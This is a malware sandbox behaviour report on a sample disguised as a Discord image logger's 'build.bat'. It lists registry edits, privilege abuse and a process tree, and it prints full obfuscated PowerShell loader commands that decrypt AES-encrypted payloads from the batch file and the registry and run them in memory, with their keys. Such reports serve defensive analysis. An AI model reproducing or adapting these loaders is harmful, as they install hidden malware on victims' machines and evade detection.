| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\svchost.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\dwm.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\dwm.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\dwm.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\dwm.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat.exe
"build.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function iwkhR($DITIA){ $XVnki=[System.Security.Cryptography.Aes]::Create(); $XVnki.Mode=[System.Security.Cryptography.CipherMode]::CBC; $XVnki.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $XVnki.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8ehdS6ppW71xL6mDjAeXsyQHYKmv0CPtd6Kn4aXzt4='); $XVnki.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hx3HwApb8t08fxY/Go7cSw=='); $LrZFK=$XVnki.CreateDecryptor(); $return_var=$LrZFK.TransformFinalBlock($DITIA, 0, $DITIA.Length); $LrZFK.Dispose(); $XVnki.Dispose(); $return_var;}function kOuIB($DITIA){ $DbpkU=New-Object System.IO.MemoryStream(,$DITIA); $qZtjl=New-Object System.IO.MemoryStream; $JMgSB=New-Object System.IO.Compression.GZipStream($DbpkU, [IO.Compression.CompressionMode]::Decompress); $JMgSB.CopyTo($qZtjl); $JMgSB.Dispose(); $DbpkU.Dispose(); $qZtjl.Dispose(); $qZtjl.ToArray();}function ZkZVP($DITIA,$AoxAJ){ $HLgZK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$DITIA); $UXpIZ=$HLgZK.EntryPoint; $UXpIZ.Invoke($null, $AoxAJ);}$zVdRm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\build.bat').Split([Environment]::NewLine);foreach ($BYfmw in $zVdRm) { if ($BYfmw.StartsWith(':: ')) { $Rndkm=$BYfmw.Substring(3); break; }}$FMGlq=[string[]]$Rndkm.Split('\');$IgKIL=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[0])));$voFjb=kOuIB (iwkhR ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($FMGlq[1])));ZkZVP $voFjb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));ZkZVP $IgKIL (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{29e3a377-95a0-4802-8a48-ee3233688157}
C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function PprBf($RmAux){ $VbRCn=[System.Security.Cryptography.Aes]::Create(); $VbRCn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VbRCn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VbRCn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU='); $VbRCn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ=='); $nMOmr=$VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')(); $WZWky=$nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmAux, 0, $RmAux.Length); $nMOmr.Dispose(); $VbRCn.Dispose(); $WZWky;}function SPSlI($RmAux){ $qrnaZ=New-Object System.IO.MemoryStream(,$RmAux); $RJeXu=New-Object System.IO.MemoryStream; $eBeQA=New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::Decompress); $eBeQA.CopyTo($RJeXu); $eBeQA.Dispose(); $qrnaZ.Dispose(); $RJeXu.Dispose(); $RJeXu.ToArray();}function aBEzg($RmAux,$ZKJrf){ $oxAUi=[System.Reflection.Assembly]::Load([byte[]]$RmAux); $qVnjt=$oxAUi.EntryPoint; $qVnjt.Invoke($null, $ZKJrf);}$VbRCn1 = New-Object System.Security.Cryptography.AesManaged;$VbRCn1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$MSWRP = $VbRCn1.('rotpyrceDetaerC'[-1..-15] -join '')();$NUNZn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iZ8jPKmNkFdL1A6USwSGLA==');$NUNZn = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn, 0, $NUNZn.Length);$NUNZn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn);$cBXxm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('302eS2iAhetJuvIY9pVgKOFxBony5LGiLQi+lPOo9Ig=');$cBXxm = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cBXxm, 0, $cBXxm.Length);$cBXxm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cBXxm);$GlTUf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2/VItTApDmqYld7UNbITmw==');$GlTUf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GlTUf, 0, $GlTUf.Length);$GlTUf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GlTUf);$YQTnf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y7u8mHn+uE8DouxrXvlfhI8HvaFVabiSu9wW1NQnVBW3d+pbXbyeWiMzHsShgQVzWTccLy3R/sL1Fgo2ngbj1Xyhdd8QHKlT7xJYowF1jSmMT/YNyn61oZ4EBOdIILtHY76iwoY89T/0NXOlbVQSqG6f76Tvu+/ljtRIjK68ygJujUjyjF9W1UFNXnjlbvKaQ0BTSj7AUpwYBspcSQUSWqlV4JZYmfkLzrzzafMFwHzW6zgfk8rU5wxN2vDnC7yji58n7rylZaggz4+okuyhoMrfM4k/T/mqHJ8VdUFO8xpIeX3hePuaZ5Z58y1CyCEoFhGVyjfm3AnZl3fgFnvsWSS15RXMq5KXGV3I38NkazdqvV05jjZTTECaOwsRwu2zLdJ29XVcSC4yPm3wAT5LZe+YH34hMw11+Tv5n+xxqwY=');$YQTnf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YQTnf, 0, $YQTnf.Length);$YQTnf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YQTnf);$CPWdf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vGf9ES1PdsfKW8Swn9bI3w==');$CPWdf = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CPWdf, 0, $CPWdf.Length);$CPWdf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CPWdf);$igAgV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UiHcuo7jcw/WkburfrLBQ==');$igAgV = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($igAgV, 0, $igAgV.Length);$igAgV = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($igAgV);$ZYOXs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hDpsuPmELCzhYTCugvhrpA==');$ZYOXs = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZYOXs, 0, $ZYOXs.Length);$ZYOXs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZYOXs);$cmXWw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Duasd/EcBtQj2cZsgiwg+Q==');$cmXWw = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cmXWw, 0, $cmXWw.Length);$cmXWw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cmXWw);$qpchR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KDa4G8PrmTjfH/8cqC5WDg==');$qpchR = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qpchR, 0, $qpchR.Length);$qpchR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qpchR);$NUNZn0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkNHx2c/PIn2isifrSOkpw==');$NUNZn0 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn0, 0, $NUNZn0.Length);$NUNZn0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn0);$NUNZn1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QCQIFS3Mnpd27lKyoiLRsA==');$NUNZn1 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn1, 0, $NUNZn1.Length);$NUNZn1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn1);$NUNZn2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('McBhlHe8GfiHzcJuHtKawA==');$NUNZn2 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn2, 0, $NUNZn2.Length);$NUNZn2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn2);$NUNZn3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iUE4hGy8AZeVxL9AvErB6A==');$NUNZn3 = $MSWRP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NUNZn3, 0, $NUNZn3.Length);$NUNZn3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NUNZn3);$MSWRP.Dispose();$VbRCn1.Dispose();if (@(get-process -ea silentlycontinue $NUNZn3).count -gt 1) {exit};$Stjgn = [Microsoft.Win32.Registry]::$cmXWw.$ZYOXs($NUNZn).$igAgV($cBXxm);$hQsbc=[string[]]$Stjgn.Split('\');$YNdMX=SPSlI(PprBf([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[1])));aBEzg $YNdMX (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NbCPC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($hQsbc[0]);$VbRCn = New-Object System.Security.Cryptography.AesManaged;$VbRCn.Mode = [System.Security.Cryptography.CipherMode]::CBC;$VbRCn.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$VbRCn.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU=');$VbRCn.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ==');$nMOmr = $VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')();$NbCPC = $nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NbCPC, 0, $NbCPC.Length);$nMOmr.Dispose();$VbRCn.Dispose();$qrnaZ = New-Object System.IO.MemoryStream(, $NbCPC);$RJeXu = New-Object System.IO.MemoryStream;$eBeQA = New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::$NUNZn1);$eBeQA.$qpchR($RJeXu);$eBeQA.Dispose();$qrnaZ.Dispose();$RJeXu.Dispose();$NbCPC = $RJeXu.ToArray();$dlxUL = $YQTnf | IEX;$oxAUi = $dlxUL::$NUNZn2($NbCPC);$qVnjt = $oxAUi.EntryPoint;$qVnjt.$NUNZn0($null, (, [string[]] ($GlTUf)))
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{75055e9e-1b36-4a8b-9f64-3cffa611d538}
C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4128).WaitForExit();[System.Threading.Thread]::Sleep(5000); function PprBf($RmAux){ $VbRCn=[System.Security.Cryptography.Aes]::Create(); $VbRCn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $VbRCn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $VbRCn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gf3NIzj2nFlOnjHyBxw3sV9/iWD1czH3fYecCqhPjrU='); $VbRCn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nom1msioM+0T3KH2R6vuXQ=='); $nMOmr=$VbRCn.('rotpyrceDetaerC'[-1..-15] -join '')(); $WZWky=$nMOmr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmAux, 0, $RmAux.Length); $nMOmr.Dispose(); $VbRCn.Dispose(); $WZWky;}function SPSlI($RmAux){ $qrnaZ=New-Object System.IO.MemoryStream(,$RmAux); $RJeXu=New-Object System.IO.MemoryStream; $eBeQA=New-Object System.IO.Compression.GZipStream($qrnaZ, [IO.Compression.CompressionMode]::Decompress); $eBeQA.CopyTo($RJeXu); $eBeQA.Dispose(); $qrnaZ.Dispose(); $RJeXu.Dispose(); $RJeXu.ToArray();}function aBEzg($RmAux,$ZKJrf){ $oxAUi=[System.Reflection.Assembly]::Load([byte[]]$RmAux); $qVnjt=$oxAUi.EntryPoint; $qVnjt.Invoke($null, $ZKJrf);}$VbRCn1 = New-Object 